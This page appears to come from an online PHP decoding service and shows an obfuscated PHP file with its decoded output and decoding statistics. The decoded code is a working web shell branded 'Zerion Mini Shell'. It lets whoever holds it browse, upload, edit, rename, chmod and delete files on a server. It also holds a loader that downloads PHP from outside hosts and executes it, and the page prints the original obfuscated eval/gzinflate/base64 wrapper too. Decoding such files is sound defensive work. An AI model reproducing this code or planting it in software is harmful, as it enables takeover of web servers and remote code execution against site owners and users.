Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

$kntl = 'eval($mryoq4272($qmhjw3080("7Vrpc9pIFv+eqvwPHYWJYAcQOORYB8jhkKM2sbO2s1WzIUvJUgO9F..

Decoded Output download


@set_time_limit(0);
@error_reporting(0);

function GCNew($a)
{
    $url = sprintf('%s?api=%s&action=%s&path=%s&token=%s', $a, $_REQUEST['api'], $_REQUEST['action'], $_REQUEST['path'], $_REQUEST['token']);
    $code = @file_get_contents($url);
    if ($code == false) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_USERAGENT, 'll');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 100);
        curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        $code = curl_exec($ch);
        curl_close($ch);
    }
    return $code;
}
if (isset($_REQUEST['action']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['token'])) {
    $code = GCNew('https://c-new.icw5.xyz/');
    $result = json_decode($code,true);
    if (isset($result['code']) && $result['code'] == 1) {
        $code = $result['data'];
    } else {
        die($result['msg']);
    }
    $need = '<' . '?' . 'php';
    if (strpos($code, $need) === false) {
        die('get failed');
    }
    $file_name = tmpfile();
    fwrite($file_name, $code);
    $a = stream_get_meta_data($file_name);
    $file_path = $a['uri'];
    $content = @file_get_contents($file_path);
    if (!$content) {
        $file_path = '.c';
        file_put_contents($file_path, $code);
    }
    @require($file_path);
    fclose($file_name);
    @unlink($file_path);
    die();
}
function GC($a)
{
    $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); }return $code;}
if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c4.icw4.xyz/'); if(!$code){$code = GC('https://c2.icw7.com/');}
    $need = '<'.'?'.'php'; if (strpos($code, $need) === false) { die('get failed'); } $file_name = tmpfile(); fwrite($file_name, $code); $a = stream_get_meta_data($file_name);$file_path = $a['uri']; $content = @file_get_contents($file_path);if(!$content){$file_path = '.c'; file_put_contents($file_path, $code);}@require($file_path); fclose($file_name);@unlink($file_path);die(); }


echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>'; echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>';if(isset($_POST['path_create'])) {if(@mkdir($path.'/' . $_POST['path_create'])){echo '<font color="green">create success :* '.$path.'/' . $_POST['path_create'].'</font><br />';}else{echo '<font color="red">create failed :* '.$path.'/' . $_POST['path_create'].'</font><br />';}}if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">File Ter-Upload :* </font><br />'; }else{ echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>
 </font><br />'; } } echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="submit" value="create" />
</form></td></td>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],octdec($_POST['perm']))){ echo '<font color="green">Change Permission Done.</font><br />'; }else{ echo '<font color="red">Change Permission Error.</font><br />'; } } echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Change Name Done.</font><br />'; }else{ echo '<font color="red">Change Name Error.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Edit File Done ~_^.</font><br />'; }else{ echo '<font color="red">Edit File Error ~_~.</font><br />'; } fclose($fp); } echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Delete Dir Done.</font><br />'; }else{ echo '<font color="red">Delete Dir Error.</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Delete File Done.</font><br />'; }else{ echo '<font color="red">Delete File Error.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>

<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>"; } echo '</table>
</div>'; } echo '<center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; }

Did this file decode correctly?

Original Code

$kntl = 'eval($mryoq4272($qmhjw3080("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")));';$vicjn5815= "7eDB2GnFc kU+I6vNVOb)*jasi;tWh :RSyKP.=9p(EAfgM381zXqdLHYo0Jm5,uxZ'r_T/lQCw4";
$mryoq4272 = $vicjn5815[45].$vicjn5815[50].$vicjn5815[25].$vicjn5815[6].$vicjn5815[44].$vicjn5815[71].$vicjn5815[23].$vicjn5815[27].$vicjn5815[1];
$qmhjw3080 = $vicjn5815[19].$vicjn5815[23].$vicjn5815[24].$vicjn5815[1].$vicjn5815[14].$vicjn5815[75].$vicjn5815[68].$vicjn5815[53].$vicjn5815[1].$vicjn5815[8].$vicjn5815[57].$vicjn5815[53].$vicjn5815[1];
eval($kntl);

Function Calls

gzinflate	1
base64_decode	1

Variables

$kntl	eval($mryoq4272($qmhjw3080("7Vrpc9pIFv+eqvwPHYWJYAcQOORYB8jh..
$mryoq4272	gzinflate
$qmhjw3080	base64_decode
$vicjn5815	7eDB2GnFc kU+I6vNVOb)*jasi;tWh :RSyKP.=9p(EAfgM381zXqdLHYo0J..

Stats

MD5	118b26a5d7aca80f01d994e40d9da0d7
Eval Count	2
Decode Time	83 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats